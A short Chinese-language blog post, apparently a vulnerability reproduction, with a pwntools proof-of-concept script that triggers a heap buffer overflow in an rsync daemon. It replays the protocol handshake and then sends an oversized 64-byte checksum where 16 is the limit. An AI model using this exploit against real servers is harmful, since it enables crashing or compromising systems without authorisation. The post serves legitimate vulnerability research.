默认配置 ftp,远程服务器上放一个 libc.so.6 文件作为测试(文件本身是什么不重要,但是要稍大一些)。

#!/usr/bin/python

from pwn import *

context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='debug')
binary = './rsync'

io = connect('127.0.0.1', 873) # 远程服务器 rsync --daemon
e = ELF(binary)
libc = ELF('/usr/lib/libc.so.6', checksec=None)

# gdb.attach(p, 'b *$rebase(0x22068)')

io.sendlineafter(b'@RSYNCD: 31.0 sha512 sha256 sha1 md5 md4', b'@RSYNCD: 31.0 sha512 sha256 sha1 md5 md4')
io.sendline(b'ftp')
io.sendafter(b'@RSYNCD: OK', bytes.fromhex('2d2d736572766572002d2d73656e646572002d766c6f67447470727a652e694c73667843497675002e006674702f6c6962632e736f2e3600001e7878683132382078786833207878683634206d6435206d64342073686131137a737464206c7a34207a6c696278207a6c69620400000700000000130000070200a0')) # 复现正常的协议交换过程等
# cksum count, block length, cksum length, remainder length
io.sendafter(b'root', p32(1) + p32(64) * 2 + p32(0))
io.send(p32(0x07000044) + p32(0xcafebabe) + cyclic(64)) # 0x07000044 为消息头,0xcafebabe 为 sum,cyclic(64) 为 sum2(长度最大 16 字节,溢出 48 字节)

io.recvall()

堆缓冲区溢出效果:

img

img

标签: none

添加新评论